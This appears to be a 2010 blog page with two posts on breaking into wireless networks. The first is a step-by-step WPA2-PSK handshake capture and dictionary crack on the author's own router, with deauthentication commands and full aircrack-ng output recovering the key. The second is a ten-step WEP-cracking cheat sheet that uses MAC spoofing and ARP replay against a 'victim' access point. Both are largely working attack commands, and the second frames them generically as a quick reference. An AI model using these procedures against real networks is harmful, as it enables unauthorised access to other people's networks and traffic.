Hacking WPA2 Wireless Networks…

June 20, 2010 at 7:17 pm (Security, Wireless)

Hey,

I decided to document how to break into a WPA2 enabled wireless network, so I setup my LinkSys WRT54G wireless router over the weekend, here is how I broke into it:

root@bt:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode disabled)

Start the wireless card in monitor mode:

root@bt:~# airmon-ng start wlan0
Interface Chipset Driver
wlan0 ZyDAS 1211 zd1211rw - [phy1]
(monitor mode enabled on mon0)

Now we want to run airodump-ng and filter out all the other access points and clients so that we only capture the handshake for our target access point (HackMe):

root@bt:~# airodump-ng --bssid 00:0C:41:9D:C7:5C --channel 6 --write HackMe-Demo mon0

CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:0C:41:9D:C7:5C 0 100 316 38 0 6 54 WPA2 CCMP PSK HackMe]

BSSID STATION PWR Rate Lost Packets Probes

00:0C:41:9D:C7:5C 00:21:5C:90:2D:89 0 1 - 1 126 456 HackMe

root@bt:~#

Whilst we leave airodump-ng capturing packets and waiting for the WPA Handshake, we can speed things up a little using aireplay-ng. We can force one of the associated clients to de-auth and it will automatically re-authenticate itself with the access point allowing us to capture the WPA Handshake:

root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:42 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:43 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [126|184 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:48 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:48 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [ 0|169 ACKs]
root@bt:~# aireplay-ng -0 1 -a 00:0C:41:9D:C7:5C -c 00:21:5C:90:2D:89 mon0
19:44:50 Waiting for beacon frame (BSSID: 00:0C:41:9D:C7:5C) on channel 6
19:44:51 Sending 64 directed DeAuth. STMAC: [00:21:5C:90:2D:89] [185|179 ACKs]
root@bt:~#

Excellent, as you can see we managed to capture the WPA Handshake, let’s crack it and get the WPA passphrase we can then use to connect to the wireless network:

CH 6 ][ Elapsed: 32 s ][ 2010-06-20 19:44 ][ WPA handshake: 00:0C:41:9D:C7:5C


root@bt:~# aircrack-ng -a 2 -b 00:0C:41:9D:C7:5C -e HackMe -w password.txt HackMe-Demo-01.cap
Opening HackMe-Demo-01.cap
Reading packets, please wait...


Aircrack-ng 1.1 r1729


[00:00:00] 4 keys tested (67.32 k/s)


KEY FOUND! [ password ]


Master Key : 52 EC 07 C0 95 E6 7B 26 DD 40 59 67 10 7C F6 F7
BE EF E6 66 8D 70 A6 1C 56 BE F5 DD A2 B8 5D 32

Transient Key : 41 3E E2 11 47 CA DA EC 39 FA B8 23 79 4C 01 6A
AC B3 C0 45 FE 62 3F BF 4F 0A A9 B0 63 A1 AC 2E
D4 9C C6 09 C1 A9 82 A8 68 1B 71 BC 65 72 BE 97
C6 A8 2F A9 12 DA 08 C6 73 A5 90 DD E9 EF 5F 66

EAPOL HMAC : CA E1 1F 29 45 9A 1D 5D 1B 25 BF 51 92 1A 95 A9
root@bt:~#

Yay! We got the passphrase, which was “password” 🙂

Permalink 3 Comments

Hacking WEP Encrypted Wireless Network Notes

May 15, 2010 at 4:09 pm (Security, Wireless)

Hey, this is just a quick post to outline the steps involved in cracking WEP protected wireless networks.  I will be using the aircrack-ng suite to do this.  Follow these steps:

1 ) airmon-ng
Find the network adapter interface to use…

2 ) airmon-ng stop wlan0
Stop the interface.

3 ) ifconfig wlan0 down
Bring the interface down.

4 ) macchanger –mac 00:11:22:33:44:55 wlan0
Bind a fake mac address to the interface.

5 ) airmon-ng start wlan0
Bring the interface back up in monitor mode.

6 ) airodump-ng wlan0
Take a look to see what networks are available.

Choose the target, grab the essential bits of information: (Victim MAC Address, BSSID, ESSID, Channel).

7 ) airodump-ng -c CHANNEL_NUMER -w FILENAME –bssid VICTIM_MAC wlan0
Start capturing IVs.

8 ) aireplay-ng -1 0 -a VICTIM_MAC -h 00:11:22:33:44:55 -e VICTIM_ESSID wlan0
Associate with the access point.

9 ) aireplay-ng -3 -b VICTIM_MAC -h 00:11:22:33:44:55 wlan0
Replay ARP packets.

10 ) aircrack-ng -n 64 -b VICTIM_MAC *.cap
Crack the password 🙂

This is a nice quick reference for hacking WEP encrypted wireless networks.

Permalink Leave a Comment